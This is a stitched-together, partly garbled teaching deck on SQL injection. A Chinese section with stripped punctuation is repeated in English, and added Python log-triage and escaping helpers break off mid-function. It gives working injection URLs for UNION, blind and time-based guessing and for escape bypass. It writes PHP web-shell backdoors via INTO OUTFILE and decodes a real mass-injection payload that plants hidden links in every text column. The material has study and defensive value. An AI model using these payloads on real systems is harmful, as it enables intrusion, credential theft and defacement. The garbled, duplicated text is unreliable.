bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
bull 有弱點的SQL語法有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `name` like $name
bull 沒有引號攻擊範例
bull httpwwwhackdemocomsearchUserphpname=ha
nd1=2unionselect123user()23
bull 實際執行語法
bull SELECT FROM `member` WHERE `name` like
hand1=2unionselect123user()
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(@s)--
MSSQL real-world case: 116jurist.ru automated injection (3/4)
• 2012-12-xx 10:03:44
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(@s)--
MSSQL real-world case: 116jurist.ru automated injection, decoded (4/4)
• Stage 1 (10:03:31): for every varchar/nvarchar/text/ntext column longer than 10 characters in every base table, cut the value off at an earlier `</title><` fragment, clearing the previous round of injected HTML:
set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1) where ['+@C+'] like ''%</title><%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
• Stage 2 (10:03:33): widen every such column longer than 20 characters to varchar(8000) NOT NULL so the payload will fit:
set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>20 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
• Stage 3 (10:03:44): append an invisibly clipped link to every such column longer than 80 characters (the link text is cp1251-encoded Russian):
set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;clip:rect(457px,auto,auto,457px);}</style><div class=a4tw><a href=http://116jurist.ru >юридические-услуги-москва</a></div>'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
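The three requests in this case hide the real statement inside `cast(0x... as varchar(8000))` and run it with `exec(@s)`, so a web-server log shows only a hex blob. The following is an added log-triage helper for that pattern, not part of the lecture or of any tool it names: it URL-decodes a request line, extracts the hex, decodes it and reports which indicators the hidden statement contains. The log format, the `INDICATORS` list and the sample requests are assumptions constructed for this example.

```python
"""Added example (not from the lecture): a small log-triage helper for the
mass-injection pattern shown in the 116jurist.ru case, where the real SQL
travels inside `cast(0x... as varchar(8000))` and is run with `exec(@s)`.
Log format, field positions and the sample requests are constructed."""
import re
from urllib.parse import unquote_plus

# Sub-strings a defender would not expect in a legitimate query string.
INDICATORS = (
    "Table_Cursor",        # cursor walking the schema
    "INFORMATION_SCHEMA",  # schema enumeration
    "EXEC(",               # dynamic SQL
    "ALTER COLUMN",        # stage 2 widened every text column
    "<a href=",            # injected HTML link
    "</title>",            # injected HTML fragment
)

HEX_CAST = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+n?varchar", re.IGNORECASE)
EXEC_VAR = re.compile(r"\bexec\s*\(\s*@\w+\s*\)", re.IGNORECASE)


def decode_hex_blob(hex_digits: str) -> tuple:
    """Decode the 0x blob. Logs often truncate long query strings, so an odd
    nibble count is tolerated and flagged rather than raising. cp1251 keeps
    every byte representable (the case study's link text was Russian)."""
    truncated = len(hex_digits) % 2 == 1
    if truncated:
        hex_digits = hex_digits[:-1]
    return bytes.fromhex(hex_digits).decode("cp1251", errors="replace"), truncated


def triage_request(log_line: str) -> dict:
    """Inspect one access-log line (constructed format: date time method
    path query status) and describe any hex-wrapped statement inside it."""
    parts = log_line.split(" ")
    query = unquote_plus(parts[4]) if len(parts) > 4 else ""
    result = {"suspicious": False, "statement": None, "indicators": [], "truncated": False}
    m = HEX_CAST.search(query)
    if not m:
        return result
    statement, truncated = decode_hex_blob(m.group(1))
    lowered = statement.lower()
    hits = [i for i in INDICATORS if i.lower() in lowered]
    result.update(
        suspicious=bool(hits) or bool(EXEC_VAR.search(query)),
        statement=statement,
        indicators=hits,
        truncated=truncated,
    )
    return result


# Constructed sample traffic. The hex is built here so the example stays
# self-contained; in a real log it arrives already encoded.
HIDDEN_SQL = "select c.TABLE_NAME from INFORMATION_SCHEMA.columns c"
SAMPLE_LINES = [
    "2012-12-01 10:03:30 GET /item.aspx Serno=51 200",
    "2012-12-01 10:03:31 GET /item.aspx "
    f"Serno=51+declare+%40s+varchar(8000)+set+%40s=cast(0x{HIDDEN_SQL.encode().hex()}"
    "+as+varchar(8000))+exec(%40s)-- 200",
]


def triage_all(lines=SAMPLE_LINES) -> list:
    """Return (time, finding) for every line whose query hides a statement."""
    findings = []
    for line in lines:
        finding = triage_request(line)
        if finding["suspicious"]:
            findings.append((line.split(" ")[1], finding))
    return findings


if __name__ == "__main__":
    for when, finding in triage_all():
        print(when, finding["indicators"], finding["statement"])
```

Matching on the decoded statement rather than on the raw request is the point: the hex wrapper defeats keyword filters that look for `UPDATE` or `INFORMATION_SCHEMA` in the query string, and the same wrapper is the first thing to strip when reconstructing what was run during the incident.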
References
• 吳翰清 (Wu Hanqing), 網路竟然這麼危險 (白帽子讲Web安全, "White Hat Talks Web Security"), 2012
• MySQL 5.1 Reference Manual: String Functions
• MySQL 5.1 Reference Manual: Miscellaneous Functions
• MySQL/PHP 对单引号转义时 load_file/outfile 生成一句话 (writing a one-line shell with load_file/outfile when single quotes are escaped)
• Shazin Sadakath, Time Based SQL Injection using heavy queries in MySQL
• Stefan Esser, MySQL and SQL Column Truncation Vulnerabilities, 2008
SQL Injection攻擊技巧 - 猜解資料常用函數
函數 功能
LENGTH(str) 返回字串長度
LEFT(strlen) 返回某字串開頭開始的len最左字串
RIGHT(strlen) 返回某字串開頭開始的len最右字串
SUBSTRING(strposlen) 取得某字串的子字串
SUBSTR(strposlen) 為SUBSTRING同義詞
MID(strposlen) 為SUBSTRING同義詞
CHAR(N [USING charset]) 其返回值為一個包含這些整數代碼值的字串
HEX(N_or_S) 如果N或S是一個數字則返回16進位N的字串
ASCII(str) 返回值為字串str的最左邊數值
CONCAT(str1str2) 返回值為所有連接參數產生的字串
NAME_CONST(namevalue) 返回一個定值當月來產生一個結果集合列時NAME_CONST()促使該列使用定義名稱 51後限制僅能使用CONST的變數
hellip
SQL Injection attack techniques - related system functions
Function – Purpose
LOAD_FILE(file_name) – reads a file
INTO OUTFILE '/var/www/html/back.php' – writes a file
VERSION() – returns the MySQL server version
DATABASE() – name of the database currently in use
USER() – returns the current MySQL user name and host name
SYSTEM_USER() – synonym for USER()
SESSION_USER() – synonym for USER()
SCHEMA() – synonym for DATABASE()
CURRENT_USER() – returns the user name and host name of the account the server authenticated, which may differ from USER()
@@DATADIR – reads the data directory path
@@BASEDIR – MySQL installation path
…
SQL Injection attack techniques – notes on reading files
• The file to be read must be on the database server
• The full path of the file must be given
• The account must have permission to read it, and the file must be fully readable
• The file to be read must be smaller than max_allowed_packet
SQL Injection attack techniques – UNION
• PHP+MySQL does not support multi-statement (stacked) queries, so a UNION query is used instead
  – Vulnerable SQL, unquoted parameter (PHP example)
    • SELECT * FROM `member` WHERE `id` = $id
  – Attack example for the unquoted parameter
    • http://www.hackdemo.com/getUser.php?id=1+and+1=2+UNION+SELECT+1,2,3,4
  – Query actually executed
    • SELECT * FROM `member` WHERE `id` = 1 AND 1=2 UNION SELECT 1,2,3,4
SQL Injection attack techniques – UNION
• PHP+MySQL does not support multi-statement (stacked) queries, so a UNION query is used instead
• Vulnerable SQL, quoted parameter (PHP example)
  • SELECT * FROM `member` WHERE `name` like '%$name%'
• Attack example for the quoted parameter
  • http://www.hackdemo.com/searchUser.php?name=h'/**/and/**/1=2/**/union/**/select/**/1,2,3,user()%23
• Query actually executed
  • SELECT * FROM `member` WHERE `name` like '%h'/**/and/**/1=2/**/union/**/select/**/1,2,3,user()#%'
SQL Injection attack techniques - successfully controlling the query
SQL Injection attack techniques – guessing data
• Get the length
  – http://www.hackdemo.com/getUser.php?id=1+AND+LENGTH(PASSWORD)=1
  – …
  – http://www.hackdemo.com/getUser.php?id=1+AND+LENGTH(PASSWORD)=7
• Guess the data
  – http://www.hackdemo.com/getUser.php?id=1+AND+RIGHT(PASSWORD,1)='a'
  – …
  – http://www.hackdemo.com/getUser.php?id=1+AND+RIGHT(PASSWORD,1)='w'
SQL Injection attack techniques – reading and writing files
• Dump data into a file
  – http://www.hackdemo.com/getUser.php?id=1+into+outfile+'D:\Website\www.hackdemo.com\member.txt'
• Write a backdoor
  – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+%22%3C?php+system($_GET['cmd']);?%3E%22,2,3,4+into+outfile+'D:\Website\www.hackdemo.com\cmd.php'
With escaping added and error messages switched off, is it safe now?
SQL Blind Injection
• Blind SQL injection is another type of SQL injection: ordinary SQL injection relies on error messages to build the attack query, whereas blind injection relies entirely on whether the injected condition evaluates true or false
• SQL Blind Injection
  – ordinary blind injection
  – Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (1/2)
• Uses a time delay to tell whether the injected SQL was executed
• Techniques
  – built-in functions
    • BENCHMARK(count, expr)
    • SLEEP(seconds)
      – MySQL >= 5
  – construct queries that take a long time to run (heavy queries)
Time-Based Blind SQL Injection - using heavy queries (2/2)
Time-Based Blind SQL Injection - guessing the database name through time delays
• http://www.hackdemo.com/getUserLash.php?id=1+UNION+SELECT+IF(SUBSTRING(db,1,1)=CHAR(1),BENCHMARK(5000000,ENCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABASE()+as+db)+AS+tb
• …
• http://www.hackdemo.com/getUserLash.php?id=1+UNION+SELECT+IF(SUBSTRING(db,1,1)=CHAR(104),BENCHMARK(5000000,ENCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABASE()+as+db)+AS+tb
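Added example, not from the original slides: a detector for the probing patterns on the blind-injection slides above, run over constructed access-log lines (the slides' hackdemo.com placeholder host). It tags single requests that carry the functions listed on these slides and reports source/script pairs that send many tagged requests, which is what character-by-character guessing and time-based probing look like from the server side; the log format with a trailing response-time field, and all function names, are this example's own assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Access-log lines constructed for this example: combined log format with the
# request time in seconds appended as the last field. hackdemo.com is the
# slides' placeholder host; the query shapes are those shown on the slides.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Mar/2013:10:03:31 +0800] "GET /getUser.php?id=1 HTTP/1.1" 200 512 0.012
10.0.0.9 - - [07/Mar/2013:10:03:33 +0800] "GET /getUser.php?id=1+and+1=1 HTTP/1.1" 200 512 0.011
10.0.0.9 - - [07/Mar/2013:10:03:34 +0800] "GET /getUser.php?id=1+and+1=2 HTTP/1.1" 200 0 0.010
10.0.0.9 - - [07/Mar/2013:10:03:35 +0800] "GET /getUser.php?id=1+AND+LENGTH(PASSWORD)=7 HTTP/1.1" 200 512 0.010
10.0.0.9 - - [07/Mar/2013:10:03:36 +0800] "GET /getUser.php?id=1+AND+RIGHT(PASSWORD,1)=%27w%27 HTTP/1.1" 200 512 0.010
10.0.0.9 - - [07/Mar/2013:10:03:40 +0800] "GET /getUserLash.php?id=1+UNION+SELECT+IF(SUBSTRING(db,1,1)=CHAR(104),BENCHMARK(5000000,ENCODE(%27ENCODE%27,%275s%27)),NULL),2,3,4+FROM+(SELECT+DATABASE()+as+db)+AS+tb HTTP/1.1" 200 512 4.812
10.0.0.9 - - [07/Mar/2013:10:03:47 +0800] "GET /getUser.php?id=1+AND+1=2+UNION+SELECT+1,2,3,load_file(0x433A5C636F6E6669672E706870)-- HTTP/1.1" 200 2048 0.015
10.0.0.7 - - [07/Mar/2013:10:03:50 +0800] "GET /searchUser.php?name=wang HTTP/1.1" 200 333 0.009
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)'
    r' [^"]*" (?P<status>\d{3}) (?P<size>\d+|-) (?P<secs>[\d.]+)$'
)

# One marker per technique on these slides, matched against the URL-decoded,
# lower-cased query string.
MARKERS = {
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*[12]\b"),
    "length_guess": re.compile(r"\blength\s*\("),
    "char_guess": re.compile(r"\b(?:left|right|substring|substr|mid|ascii)\s*\("),
    "union": re.compile(r"\bunion\s+select\b"),
    "time_based": re.compile(r"\b(?:sleep|benchmark)\s*\("),
    "file_io": re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b"),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{6,}\b"),
}
HEX_RE = re.compile(r"\b0x([0-9a-fA-F]{6,})\b")


def decode_hex_literals(query: str) -> list:
    """Turn 0x... literals back into text so the analyst sees what the payload
    referred to (for example the path handed to load_file())."""
    return [bytes.fromhex(h).decode("latin-1") for h in HEX_RE.findall(query)]


def classify_request(target: str) -> dict:
    """Split a request target into script and decoded query, then tag it."""
    parts = urlsplit(target)
    query = unquote_plus(parts.query)
    lowered = query.lower()
    tags = [name for name, rx in MARKERS.items() if rx.search(lowered)]
    return {"script": parts.path, "query": query, "tags": tags,
            "decoded_hex": decode_hex_literals(query)}


def analyze_log(text: str, slow_seconds: float = 2.0, probe_min: int = 3) -> dict:
    """Return every tagged request plus the (ip, script) pairs that sent at
    least probe_min tagged requests, the one-guess-per-request rhythm of
    blind injection. A time_based tag on a request that also took at least
    slow_seconds is upgraded to time_based_confirmed."""
    flagged, per_pair = [], Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                          # unparsable line: skip, never crash
        info = classify_request(m["target"])
        if not info["tags"]:
            continue
        secs = float(m["secs"])
        if "time_based" in info["tags"] and secs >= slow_seconds:
            info["tags"].append("time_based_confirmed")
        info.update(ip=m["ip"], ts=m["ts"], secs=secs)
        flagged.append(info)
        per_pair[(m["ip"], info["script"])] += 1
    probing = {pair: n for pair, n in per_pair.items() if n >= probe_min}
    return {"flagged": flagged, "probing": probing}
```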
SQL Injection attack techniques - bypassing escaped characters
• ASCII encoding
  – ASCII(), CHAR()
  – a single character
    • CHAR(68)
  – several characters
    • CHAR(68, 58, 92)
• Hexadecimal encoding
  – HEX()
  – 0x443A5C
• Double-byte escape technique
SQL Injection attack techniques - guessing data (bypassing escaping)
• Guess the table/field names
  – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4+FROM+user--
  – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4+FROM+member--
• Guess the field data
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT(PASSWORD,1)=char(0)
  – …
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT(PASSWORD,1)=char(119)
SQL Injection attack techniques - reading data (bypassing escaping)
• Reading data, writing files
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+1=2+UNION+SELECT+1,2,3,load_file(char(68,58,92,87,101,98,115,105,116,101,92,119,119,119,46,104,97,99,107,100,101,109,111,46,99,111,109,92,103,101,116,85,115,101,114,46,112,104,112))--
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+1=2+UNION+SELECT+1,2,3,load_file(0x443A5C576562736974655C7777772E6861636B64656D6F2E636F6D5C636F6E6669672E706870)--
SQL Injection attack techniques – writing a file (when the quote restriction cannot be bypassed)
1. Find phpMyAdmin
2. Remote MySQL
mysql> use xssdb;
mysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323435463530344635333534354232373633364436343237354432393342334633452066726F6D20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E706870 27;
mysql> prepare cmd from @a;
mysql> execute cmd;
@a is:
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from xss limit 1 into outfile 'C:/shell.php'
The file written is:
<?php @eval($_POST['cmd']);?>
SQL Injection attack techniques - double-byte escape technique (1/3)
• The injected byte and the escaping backslash (0x5C) are recombined into one character, bypassing the escaping
• Scenario
  – escaping performed by
    • addslashes
    • mysql_escape_string
    • php.ini
      – magic_quotes_gpc enabled
  – BIG5 or GBK encoding in use
    • set names gbk / set names big5
SQL Injection attack techniques - double-byte escape technique (2/3)
• Characters of the Chinese locales are represented by two bytes
  – Big5
    • high byte 0x81-0xFE, low byte 0x40-0x7E and 0xA1-0xFE
  – GBK
    • lead byte 0x81-0xFE, trail byte 0x40-0x7E
  – GB2312
    • lead byte 0xB0-0xF7, trail byte 0xA0-0xFE
  – attack bytes: BF, CC, D5, …
SQL Injection attack techniques - double-byte escape technique (3/3)
• Bypassing escaping on a quoted parameter
  – http://www.hackdemo.com/searchUserLash.php?name=h%B5%27+AND+1=2+UNION+SELECT+1,2,3,4%23
  – http://www.hackdemo.com/searchUserLash.php?name=h%CC%27+AND+1=2+UNION+SELECT+1,2,3,4%23
  – http://www.hackdemo.com/searchUserLash.php?name=h%D5%27+AND+1=2+UNION+SELECT+1,2,3,4%23
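As an added example (not from the original slides), the Python below reproduces the mechanism of the three double-byte slides above and the check a defender wants: addslashes()-style byte-wise escaping leaves an unescaped quote once the server reads the bytes as GBK or Big5, while escaping per character of the connection charset, or simply using UTF-8 as the defence slide later recommends, does not. The function names and the probe inputs are this example's own.

```python
from typing import Callable, Optional

# Bytes a MySQL string literal needs escaped, as addslashes() and
# mysql_escape_string() handle them, with their escaped forms.
SPECIALS = {0x27: b"\\'", 0x22: b'\\"', 0x5C: b"\\\\", 0x00: b"\\0"}


def escape_bytewise(data: bytes) -> bytes:
    """addslashes()-style escaping: one byte at a time, with no knowledge of
    the connection charset. Safe only when no multibyte character can
    contain 0x5C, which holds for UTF-8 but not for GBK or Big5."""
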